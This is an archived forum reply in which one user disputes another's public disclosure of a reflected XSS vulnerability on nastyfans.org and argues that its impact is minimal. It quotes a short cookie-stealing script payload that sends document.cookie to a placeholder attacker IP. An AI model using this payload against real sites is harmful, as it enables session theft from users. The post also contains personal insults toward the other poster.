Ninjastic
PostEdited versionsQuotes to this post
Post
Topic
Board Reputation
Merits 4 from 2 users
Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
by
bob123
on 23/06/2020, 09:17:37 UTC
⭐ Merited by Foxpup (2) ,OgNasty (2)
Quote from: Boris007 on Today at 02:25:02 AM
[...]
I do not know who naypalm is and it seems he last logged a week back is very infrequent here.
So I would disclose the vulnerability to the forum(only).

--------------------------
ENd of PM
--------------------------

So because he logs in infrequently you decided to publicly disclose it ?
Because you need the attention and can't wait a month or two for it to be fixed ?



Quote from: Boris007 on Today at 02:25:02 AM
Bottom line: What much one can do with reflected XSS? It is shit..and again one more shit reflected XSS by boris007 --Bob123456, Cat meow.
Top Line: https://www.dionach.com/blog/the-real-impact-of-cross-site-scripting/  --Security Community

All you can do is obviously to use the free version of the burp suite and make popups.
You found a reflected XSS, not a persistent one.

You like your low-level examples, i understood this already.

For example, this:
Quote from: https://www.dionach.com/blog/the-real-impact-of-cross-site-scripting/
<script>
  image = new Image();
  image.src='https://[Attacker IP]:8080/?'+document.cookie;
</script>

This is only possible, if the HttpOnly flag is not set.
Otherwise the cookie can not be accessed by a script.

All you can do with that is to craft an own URL, and send it to someone to have the script being executed.

How would you exploit that on such a site, where no valuable or sensitive information is being stored/entered anyway?
Short answer: You can't.


You are obviously a script kiddy, breaking laws and being a dick, just to gain some attention.
You don't understand what you actually found and don't know how this could be exploited.